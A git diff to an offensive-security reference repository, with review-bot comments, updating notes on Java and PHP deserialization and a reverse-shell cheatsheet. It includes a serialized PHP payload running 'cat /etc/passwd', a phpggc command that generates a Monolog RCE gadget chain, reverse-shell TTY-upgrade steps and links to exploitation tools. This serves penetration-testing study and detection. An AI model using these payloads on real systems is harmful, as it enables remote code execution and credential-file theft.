diff --git a/Java Deserialization/README.md b/Java Deserialization/README.md index 48670be..50e90f8 100644 --- a/Java Deserialization/README.md +++ b/Java Deserialization/README.md @@ -1,5 +1,12 @@ # Java Deserialization +## Detection + +- "AC ED 00 05" in Hex +- "rO0" in Base64 +- Content-type = "application/x-java-serialized-object" +- "H4sIAAAAAAAAAJ" in gzip(base64) + ## Exploit [ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. @@ -54,8 +61,12 @@ Additional tools (integration ysoserial with Burp Suite): JRE8u20_RCE_Gadget [https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget) +JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss) + ## Thanks to - [Github - ysoserial](https://github.com/frohoff/ysoserial) - [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) +- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) +- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index d7aad3c..e20ddb4 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md 
@@ -151,12 +151,19 @@ lua: os.execute('/bin/sh') ``` Access shortcuts, su, nano and autocomplete in a partially tty shell -/!\ OhMyZSH might break this trick +/!\ OhMyZSH might break this trick, a simple `sh` is recommended ```powershell +# in host ctrl+z stty raw -echo fg + +# in reverse shell +reset +export SHELL=bash +export TERM=xterm-256color +stty rows columns ``` (From within vi) diff --git a/PHP serialization/README.md b/PHP serialization/README.md index 765d7b9..c0dce3b 100644 --- a/PHP serialization/README.md +++ b/PHP serialization/README.md @@ -130,8 +130,25 @@ echo urlencode(serialize(new PHPObjectInjection)); //'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}' ``` +## Finding and using gadgets + +[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks: + +- Laravel +- Symfony +- SwiftMailer +- Monolog +- SlimPHP +- Doctrine +- Guzzle + +```powershell +phpggc monolog/rce1 'phpinfo();' -s +``` + ## Thanks to -* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) -* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) -* [PHP unserialize](http://php.net/manual/en/function.unserialize.php) +- [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) +- [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) +- [PHP unserialize](http://php.net/manual/en/function.unserialize.php) +- [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) \ No newline at end of file
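Review bot: in the new Detection list of `Java Deserialization/README.md`, the bullet "H4sIAAAAAAAAAJ" in gzip(base64) identifies a gzip stream, not a Java serialized object: `H4sI` is the base64 encoding of the gzip magic `1F 8B 08`, so this prefix matches any base64-wrapped gzip content and the `AC ED 00 05` check can only be made after decompressing. Reword the bullet to say the serialized stream may be gzip-compressed under this prefix and needs to be inflated before the magic is looked for. The `rO0` shortcut likewise only holds when `AC ED 00 05` sits at the start (or at a 3-byte-aligned offset) of the base64 input; bytes in front of it change the encoded prefix, so "rO0" is a quick check, not a guarantee. Minor: write the header as `Content-Type: application/x-java-serialized-object`. These same markers are also what a defender would log or alert on at the proxy or WAF, which is worth one sentence in the section.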
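Review bot: the second hunk of `Java Deserialization/README.md` leaves the file without a trailing newline (`\ No newline at end of file`); add one so the next edit to the reference list does not show this line as changed. The JexBoss entry otherwise follows the "name, URL" layout of the tool lines above it.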
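Review bot: in the `Reverse Shell Cheatsheet.md` hunk, `stty rows columns` is not a valid command as written, since stty expects numeric arguments; it should read `stty rows <rows> columns <cols>`, with the two values read from the host terminal beforehand (`stty size` or `stty -a` in the "in host" block). Consider moving `export TERM=xterm-256color` above `reset`, because `reset` prompts for a terminal type when TERM is unset, which is the usual state in such a shell. `export SHELL=bash` should carry the full path (`/bin/bash`), as SHELL is expected to hold a path. Style: the fence is tagged `powershell` but the commands are POSIX shell, so `bash` would be the accurate tag if the file's convention allows it.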
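Review bot: the new "Finding and using gadgets" section in `PHP serialization/README.md` only shows generating a chain; add a sentence that a chain such as `monolog/rce1` works only when the target application can autoload the classes of that library (and a compatible version of it), which is what the framework list actually enumerates, and that `phpggc -l` lists the available chains. The `-s` flag in the example is unexplained; add a short comment stating its effect rather than leaving the reader to guess. The list also mixes frameworks (Laravel, Symfony, SlimPHP) with libraries (Monolog, Guzzle, SwiftMailer, Doctrine); "libraries and frameworks" would be more accurate. Finally, the `*` to `-` bullet change in "Thanks to" is unrelated noise in this hunk, and the file again ends without a trailing newline.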